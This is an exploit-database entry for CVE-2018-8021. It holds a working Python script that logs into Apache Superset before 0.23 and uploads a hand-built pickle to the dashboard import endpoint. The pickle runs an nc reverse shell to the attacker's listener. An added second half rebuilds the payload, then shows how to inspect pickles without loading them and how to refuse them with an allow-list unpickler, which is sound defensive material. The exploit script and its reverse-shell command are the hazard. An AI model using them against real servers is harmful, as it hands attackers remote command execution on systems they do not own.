# Exploit Title: Apache Superset < 0.23 - Remote Code Execution
# Date: 2018-05-17
# Exploit Author: David May (david.may@semanticbits.com)
# Vendor Homepage: https://superset.apache.org/
# Software Link: https://github.com/apache/incubator-superset
# Version: Any before 0.23
# Tested on: Ubuntu 18.04
# CVE-ID: CVE-2018-8021

# I originally disclosed this to the Apache Superset team back in May, and the fix had already been
# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.

#!/usr/bin/env python
import sys
import os
from lxml import html
import requests

# Change these values to your TCP listener (myPort is left blank here; set it to the port your listener is on)
myIP = '192.168.137.129'
myPort = ''

# Credentials must belong to a user with the 'can Import Dashboards on Superset' privilege
username = 'test'
password = 'test'

# Usage message in case script arguments are not given
if len(sys.argv) < 3:
    print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')
    print('Script Usage:')
    print('./supersetrce.py <superset server ip> <superset port>')
    sys.exit()
else:
    # Script arguments
    supersetIP = sys.argv[1]
    supersetPort = sys.argv[2]

# Verify these URLs match your environment
login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'
upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'

# Remove the payload file if it already exists, in case this is run more than once
if os.path.isfile('evil.pickle'):
    os.remove('evil.pickle')

# Headers that we append to our POST requests
headers_dict = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
    'DNT': '',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '',
}

# Create the evil pickle file and write the reverse shell to it.
# This is a hand-written protocol-0 pickle: 'c' GLOBAL os.system, '(' MARK, 'S' STRING <command>,
# 't' TUPLE, 'R' REDUCE (calls os.system(command)), '.' STOP. The import endpoint unpickles the
# upload, and the REDUCE opcode runs the command as the Superset process user.
with open('evil.pickle', 'w') as evilPickle:
    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')

# Start a session so we have persistent cookies
session = requests.session()

# Grab the login page to parse it for its CSRF token
login_page = session.get(login_URL)
if login_page.status_code != 200:
    print('Login page not reached, verify URLs in script')
    sys.exit(1)
login_tree = html.fromstring(login_page.content)
# xpath() returns a list; requests encodes a one-element list as a single form field
csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')

# Form data that is sent in the POST request to the login page
login_data = {
    'csrf_token': csrf_token,
    'username': username,
    'password': password,
}

# Add the Referer header for the login page
headers_dict['Referer'] = login_URL

# Logon action
login = session.post(login_URL, headers=headers_dict, data=login_data)

# Grab the upload page to parse it for its CSRF token.
# Note: requests follows redirects, so a 200 here can also be the login page if the
# credentials were wrong; the upload will then simply have no effect.
upload_page = session.get(upload_URL)
if upload_page.status_code != 200:
    print('Upload page not reached, verify credentials and URLs in script')
    sys.exit(1)
upload_tree = html.fromstring(upload_page.content)
csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')

# Add the Referer header for the upload page
headers_dict['Referer'] = upload_URL

# Upload action: the server unpickles the file and the command in the pickle runs
upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token': csrf_token},
                      files={'file': ('evil.pickle', open('evil.pickle', 'rb'), 'application/octet-stream')})
print('Upload returned HTTP ' + str(upload.status_code) + '; check your listener')

# Close the session
session.close()
sys.exit()
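The script above relies on one thing: the import_dashboards handler in the affected versions hands the uploaded file to pickle.load(), and a pickle can name any importable callable (here os.system) and call it via REDUCE. The following is an added example, not part of David May's exploit or of the Superset code base. It hand-assembles the same protocol-0 payload, builds the protocol-4 equivalent (which uses STACK_GLOBAL instead of GLOBAL) through __reduce__, then shows the two checks a defender wants: a scan that lists every global a pickle would import without executing it (pickletools.genops only decodes opcodes), and a restricted Unpickler whose find_class refuses anything not on an allow-list. LISTENER_IP, LISTENER_PORT and the empty allow-list are assumptions for the demonstration; a real importer would allow-list exactly the model classes it expects, or, as the 0.23 fix did, stop using pickle for uploads altogether.

```python
"""Added example (not from the exploit or from Superset): build the pickle
payload, inspect it without loading it, and refuse it with a restricted loader."""
import io
import os
import pickle
import pickletools

# Placeholders with the same role as myIP / myPort in the exploit (assumed values).
LISTENER_IP = "192.168.137.129"
LISTENER_PORT = "4444"

# pickle names os.system by the module it really lives in ('posix' on Linux,
# 'nt' on Windows), so compute the expected dotted name instead of hard-coding it.
EXPECTED_P4_GLOBAL = os.system.__module__ + ".system"


def build_payload(ip, port):
    """Hand-assemble the protocol-0 pickle the exploit writes to evil.pickle.
    Opcodes: c GLOBAL 'os system', ( MARK, S STRING <cmd>, t TUPLE, R REDUCE, . STOP.
    Nothing executes until something calls pickle.load() on these bytes."""
    cmd = ("rm /tmp/backpipe;mknod /tmp/backpipe p;"
           "/bin/sh 0</tmp/backpipe | nc " + ip + " " + port + " 1>/tmp/backpipe")
    return ("cos\nsystem\n(S'" + cmd + "'\ntR.").encode()


class _Evil:
    """Same primitive expressed via __reduce__; pickle.dumps() only records the
    call, it does not make it. Constructed for the example, never loaded unrestricted."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))


def protocol4_payload():
    """Protocol 4 encodes the callable as two string pushes plus STACK_GLOBAL."""
    return pickle.dumps(_Evil(), protocol=4)


def benign_payload():
    """Constructed harmless pickle for comparison: a plain dict, no globals at all."""
    return pickle.dumps({"a": 1}, protocol=4)


def pickle_globals(data):
    """Return every 'module.name' a pickle would import, by walking its opcode
    stream with pickletools.genops. No opcode is executed, so this is safe to
    run on an untrusted upload before deciding whether to load it."""
    strings = []   # strings pushed so far; STACK_GLOBAL consumes the last two
    found = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                 # protocols 0-3: arg is "module name"
            found.append(arg.replace(" ", ".", 1))
        elif op.name == "STACK_GLOBAL":         # protocol 4+: module, name were pushed
            if len(strings) < 2:
                found.append("<unresolved>")    # malformed stream; still flag it
            else:
                name, module = strings.pop(), strings.pop()
                found.append(module + "." + name)
        elif op.name in ("STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
                         "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"):
            strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: find_class is the only place a pickle can reach code,
    so resolve nothing that is not explicitly allow-listed. Empty here (assumed);
    an importer would list the exact classes it expects, e.g. ("mymodels", "Dashboard")."""
    ALLOWED = frozenset()

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("refusing global %s.%s" % (module, name))


def restricted_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_refused(data):
    """True if the restricted loader rejected the pickle before anything ran."""
    try:
        restricted_load(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    p0 = build_payload(LISTENER_IP, LISTENER_PORT)
    pickletools.dis(p0)                    # shows GLOBAL 'os system' ... REDUCE
    print("globals:", pickle_globals(p0))  # ['os.system']
    print("refused:", load_refused(p0))    # True
```

pickletools.dis on the protocol-0 payload is the quickest way to see what the exploit file is: GLOBAL, MARK, STRING, TUPLE, REDUCE, STOP, with no dashboard data in it at all. The same scan applied to a genuine export from a vulnerable version would list the importer's model classes, which is why an allow-list (or a format that cannot name code, such as JSON) is the fix rather than a blocklist of os and subprocess.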
